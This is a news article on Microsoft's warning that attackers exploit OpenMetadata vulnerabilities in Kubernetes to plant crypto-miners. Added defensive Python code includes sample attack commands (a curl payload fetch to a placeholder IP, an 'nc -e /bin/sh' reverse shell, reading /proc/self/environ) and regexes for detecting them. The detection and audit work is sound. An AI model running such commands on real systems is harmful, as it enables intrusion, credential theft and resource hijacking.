
Cryptocurrency News

Microsoft warns: cybercriminals are exploiting OpenMetadata flaws to mine cryptocurrency

2024/04/19 05:53

Unpatched OpenMetadata vulnerabilities disclosed in March are being actively exploited by malicious actors to gain access to Kubernetes environments and install crypto-mining malware. The vulnerabilities allow attackers to bypass authentication, obtain remote code execution and steal AWS credentials in order to mine cryptocurrency on the victims' resources. Microsoft advises administrators to update the OpenMetadata image to the latest version and to implement strong authentication to mitigate these risks.


Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns


In a chilling exposé, Microsoft has unveiled a disturbing trend: cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source software suite, to mine cryptocurrency at the expense of unsuspecting victims. These exploits, which have been ongoing since early April, are targeting Kubernetes environments where OpenMetadata is deployed without the necessary security patches.


Unpatched OpenMetadata Systems: A Gateway for Malicious Actors


OpenMetadata vulnerabilities, disclosed in March, encompass a range of critical and high-severity flaws that can be exploited to bypass authentication and gain remote code execution (RCE) within OpenMetadata deployments. Microsoft's threat intelligence team has identified five specific CVEs that are being leveraged in these attacks:


  • CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
  • CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
  • CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28254: OS command injection vulnerability (CVSS: 8.8)

These vulnerabilities provide attackers with a gateway into vulnerable systems, allowing them to penetrate OpenMetadata containers and execute malicious commands. The attackers' primary objective is to surreptitiously mine cryptocurrency using the victims' computing resources.


The Attack Sequence: A Step-by-Step Account


The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.


"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."


Crypto-Malware Deployment and Remote Access


Once they have gained a foothold, the attackers download crypto-mining malware from a remote server in China. In some cases, the attackers have even left behind a desperate plea, hoping to evoke sympathy from their victims:


"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"


It remains unclear whether this sob story has swayed any victims into transferring Monero crypto-coins to the attackers.


After deploying the mining malware, the attackers establish a reverse shell connection using Netcat to maintain remote access to the container. Additionally, they install cronjobs for scheduling, ensuring that the malware will execute at predetermined times.
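The chain described above (reading the workload's environment, fetching a payload from a remote host, a Netcat reverse shell, cron-based persistence) is most useful to a defender as a sequence of process events inside one container. The following Python snippet is an added example, not code from the article or from Microsoft: it scores constructed container process-execution events against those four stages and raises an alert only when several stages appear in the same container. The event shape, the `203.0.113.10` address (a TEST-NET-3 placeholder) and every command line are constructed for illustration.

```python
import re

# Constructed process-execution events in the shape a container runtime sensor
# might emit (container name plus the executed command line). The remote address
# 203.0.113.10 is a documentation placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"container": "openmetadata-server", "cmdline": "sh -c env"},
    {"container": "openmetadata-server", "cmdline": "cat /proc/self/environ"},
    {"container": "openmetadata-server", "cmdline": "uname -a"},
    {"container": "openmetadata-server", "cmdline": "curl -s http://203.0.113.10/payload -o /tmp/.x"},
    {"container": "openmetadata-server", "cmdline": "nc -e /bin/sh 203.0.113.10 4444"},
    {"container": "openmetadata-server", "cmdline": "crontab -"},
    {"container": "web-frontend", "cmdline": "curl -s http://api.internal/health"},
    {"container": "web-frontend", "cmdline": "uname -a"},
]

# One pattern per stage of the chain described in the article. Each stage on its
# own is noisy (operators run `env` and `uname` too); the signal is several stages
# occurring in the same container.
STAGE_PATTERNS = {
    # Environment and host enumeration (env vars may hold service credentials).
    "recon": re.compile(
        r"\b(env|printenv|uname|lscpu|ifconfig|whoami|w|who)\b"
        r"|/proc/[^ ]+/environ|\bip\s+a(ddr)?\b"
    ),
    # Fetching a remote file to disk or straight into a shell.
    "download": re.compile(
        r"\b(curl|wget)\b.*\bhttps?://.*(\s-[oO]\b|\s>\s*/tmp|\|\s*(sh|bash)\b)"
    ),
    # Netcat variants launched with a program attached to the connection.
    "reverse_shell": re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*[ec]\b"),
    # Scheduled execution to keep the miner running.
    "persistence": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
}


def detect_stages(events):
    """Map each container name to the set of attack stages seen in its events."""
    stages = {}
    for ev in events:
        for stage, pattern in STAGE_PATTERNS.items():
            if pattern.search(ev["cmdline"]):
                stages.setdefault(ev["container"], set()).add(stage)
    return stages


def alerts(events, min_stages=3):
    """Containers in which at least `min_stages` distinct stages were observed."""
    return sorted(
        name for name, seen in detect_stages(events).items() if len(seen) >= min_stages
    )


if __name__ == "__main__":
    for name, seen in detect_stages(SAMPLE_EVENTS).items():
        print(f"{name}: {sorted(seen)}")
    print("alert:", alerts(SAMPLE_EVENTS))
```

The threshold is the important design choice: a single `uname -a` in the frontend container is not an incident, whereas four stages inside the OpenMetadata container within one session is the pattern the article describes. In a real pipeline the events would also carry timestamps so the stage window can be bounded.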


Protecting Against Crypto-Mining Exploits


Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date. If OpenMetadata is exposed to the internet, strong authentication measures should be implemented, and default credentials should be avoided.
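Microsoft's advice (keep the image current, add strong authentication where the service is internet-facing, and remember that the container's environment variables may hold credentials) can be turned into a cluster audit. The Python snippet below is an added example and is not code from the article, from Microsoft or from the OpenMetadata project: it walks constructed Kubernetes Pod and Service objects and reports OpenMetadata containers that run a floating image tag (so the patch level cannot be verified), carry credential-looking environment variables as plaintext `value` entries in the pod spec, or are selected by a `LoadBalancer`/`NodePort` Service. The image names, tags, label values and environment variable names are constructed placeholders.

```python
import re

# Environment variable names that usually hold a credential.
SECRET_NAME = re.compile(r"(PASSWORD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.I)

# Constructed Pod objects (subset of the Kubernetes schema). Image references and
# tags are placeholders; "patched-release-placeholder" stands for a pinned,
# patched release tag chosen from the vendor's advisory.
PODS = [
    {"metadata": {"name": "openmetadata-server-0",
                  "labels": {"app": "openmetadata", "tier": "public"}},
     "spec": {"containers": [{
         "name": "openmetadata",
         "image": "example.registry/openmetadata/server:latest",
         "env": [
             {"name": "DB_USER_PASSWORD", "value": "constructed-plaintext"},
             {"name": "LOG_LEVEL", "value": "INFO"},
         ]}]}},
    {"metadata": {"name": "openmetadata-server-hardened",
                  "labels": {"app": "openmetadata", "tier": "internal"}},
     "spec": {"containers": [{
         "name": "openmetadata",
         "image": "example.registry/openmetadata/server:patched-release-placeholder",
         "env": [
             {"name": "DB_USER_PASSWORD",
              "valueFrom": {"secretKeyRef": {"name": "openmetadata-db", "key": "password"}}},
         ]}]}},
    {"metadata": {"name": "web-frontend", "labels": {"app": "web"}},
     "spec": {"containers": [{"name": "web", "image": "example.registry/web:latest"}]}},
]

# Constructed Service objects: one exposes the public tier outside the cluster.
SERVICES = [
    {"metadata": {"name": "openmetadata-public"},
     "spec": {"type": "LoadBalancer", "selector": {"app": "openmetadata", "tier": "public"}}},
    {"metadata": {"name": "openmetadata-internal"},
     "spec": {"type": "ClusterIP", "selector": {"app": "openmetadata"}}},
]


def is_openmetadata(pod):
    """Scope the audit to OpenMetadata workloads by label or image name."""
    labels = pod["metadata"].get("labels", {})
    if "openmetadata" in labels.get("app", "").lower():
        return True
    return any("openmetadata" in c["image"].lower() for c in pod["spec"]["containers"])


def image_tag(image):
    """Return the tag of an image reference, or "" when none is given."""
    name = image.split("@")[0]            # drop any digest
    colon, slash = name.rfind(":"), name.rfind("/")
    return name[colon + 1:] if colon > slash else ""


def audit_pod(pod):
    findings = []
    for c in pod["spec"]["containers"]:
        # A digest pins the image exactly; otherwise require a non-floating tag.
        if "@sha256:" not in c["image"] and image_tag(c["image"]) in ("", "latest"):
            findings.append("floating-image-tag")
        # Inline `value` puts the credential into the manifest itself; a Secret
        # reference keeps it out of the pod spec and behind RBAC (the process
        # still sees it, so this narrows exposure rather than removing it).
        for env in c.get("env", []):
            if SECRET_NAME.search(env["name"]) and "value" in env:
                findings.append("plaintext-credential-env")
    return findings


def audit_exposure(pod, services):
    labels = pod["metadata"].get("labels", {})
    findings = []
    for svc in services:
        selector = svc["spec"].get("selector", {})
        selected = selector and all(labels.get(k) == v for k, v in selector.items())
        if selected and svc["spec"].get("type") in ("LoadBalancer", "NodePort"):
            findings.append("externally-exposed")
    return findings


def audit(pods, services):
    """Return {pod name: sorted list of finding codes} for OpenMetadata pods."""
    report = {}
    for pod in pods:
        if is_openmetadata(pod):
            codes = audit_pod(pod) + audit_exposure(pod, services)
            report[pod["metadata"]["name"]] = sorted(set(codes))
    return report


if __name__ == "__main__":
    for name, codes in audit(PODS, SERVICES).items():
        print(name, codes or "ok")
```

Against a live cluster the same functions can be fed the output of `kubectl get pods,services -A -o json`. An `externally-exposed` finding is not itself a defect, but it is exactly the case where the article says strong authentication is required and default credentials must not remain.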


These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.


Disclaimer: info@kdj.com

The information provided is not trading advice. kdj.com does not assume any responsibility for any investments made based on the information provided in this article. Cryptocurrencies are highly volatile and it is highly recommended that you invest with caution after thorough research!

If you believe that the content used on this website infringes your copyright, please contact us immediately (info@kdj.com) and we will delete it promptly.
